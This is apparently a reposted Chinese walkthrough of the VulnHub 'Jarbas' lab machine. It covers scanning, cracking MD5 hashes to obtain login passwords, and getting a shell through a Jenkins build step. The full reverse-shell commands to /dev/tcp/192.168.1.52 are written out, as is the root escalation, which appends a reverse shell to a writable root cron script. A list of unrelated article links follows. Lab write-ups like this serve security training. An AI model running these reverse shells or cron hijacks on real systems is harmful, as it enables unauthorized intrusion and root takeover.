当前位置: 首页 > news >正文

vulnhub靶场之Jarbas

1 信息收集

1.1 主机发现

arp-scan -l

发现主机IP地址为:192.168.1.16

1.2 端口发现

nmap -sS -sV -A -T5 -p- 192.168.1.16

存在端口22,80,3306,8080

1.3 目录扫描

dirsearch -u 192.168.1.16 

2 端口访问

2.1 80端口

2.2 3306端口

2.3 8080端口

2.4 access.html页面

2.5 md5解密

那么我们用 md5 进行解密

italia99

marianna

vipsu

3 漏洞利用

3.1 进入后台

收集到账号和密码进入后台

3.2 构建任务 进行 shell 反弹

创建反弹shell:bash -i &> /dev/tcp/192.168.1.52/1111 0>&1

跟着下面图片的步骤:

注意ip还有端口写上kali的ip和端口

3.3 kali上线

点击立即构建

成功拿到 shell

4 提权

4.1 计划任务

这里提权需要用的是计划任务,计划任务启动调用的是 root 权限,那如果计划任务里面有个反弹命令的话,当它执行的时候,就是 root 权限的会话,那如果我们修改服务器上的计划任务内容,插入恶意语句去让它执行,就能达到目的

cat /etc/crontab

这里有个计划任务,用 root 去执行 cleaningscript.sh 这个文件,每 5 分钟执行一次

那么我们接下来就尝试修改/etc/script/CleaningScript.sh 脚本

cat /etc/script/CleaningScript.sh

可以看见这脚本在执行的是一个删除日志的任务,我们要修改脚本.

ls -l /etc/script

我们可以看到这个文件是可以进行修改权限的

因为是不完全的 shell,我们使用 vim 有限制,我们通过 echo 追加内容

echo "/bin/bash -i >& /dev/tcp/192.168.1.52/6666 0>&1" >> /etc/script/CleaningScript.sh

提权成功

http://www.lryc.cn/news/393386.html

相关文章:

  • 解决onlyoffice警告的一些思路
  • 快速上手指南:使用 Minikube 在本地运行 Kubernetes 集群
  • 【C语言】指针(1):入门理解篇
  • 经典双运算放大器LM358
  • adb不插usb线通过wifi调试
  • vulnhub--IMF
  • ePTFE膜(膨体聚四氟乙烯膜)应用前景广阔 本土企业技术水平不断提升
  • C++与C#创建位图,是否需要区分RGB和BGR模式
  • web学习笔记(八十)
  • 深度解析 Raft 分布式一致性协议
  • Android10以上实现获取设备序列号功能
  • 从0到1:培训老师预约小程序开发笔记二
  • 【FFmpeg】av_read_frame函数
  • 女生学计算机好不好?感觉计算机分有点高……?
  • windows10/11 如何开启卓越性能模式
  • JSP WEB开发(二) JavaBean
  • G2.【C语言】EasyX绘制颜色窗口
  • 异构计算技术与DTK异构开发套件
  • 数据结构之“栈”(全方位认识)
  • vue项目打包部署后 浏览器自动清除缓存问题(解决方法)
  • 解决vscode配置C++编译带有中文名称报错问题
  • A61 STM32_HAL库函数 之 TIM扩展驱动 -- C -- 所有函数的介绍及使用
  • 使用瀚高数据库开发管理工具进行数据的备份与恢复---国产瀚高数据库工作笔记008
  • css 选择器汇总
  • My Greedy Algorithm(贪心算法)之路(一)
  • Win11 Python3.10 安装pytorch3d
  • kotlin 中 string array 怎么表示
  • ffmpeg使用bmp编码器把bgr24编码为bmp图像
  • 基于YOLOv10+YOLOP+PYQT的可视化系统,实现多类别目标检测+可行驶区域分割+车道线分割【附代码】
  • 计算机网络之令牌总线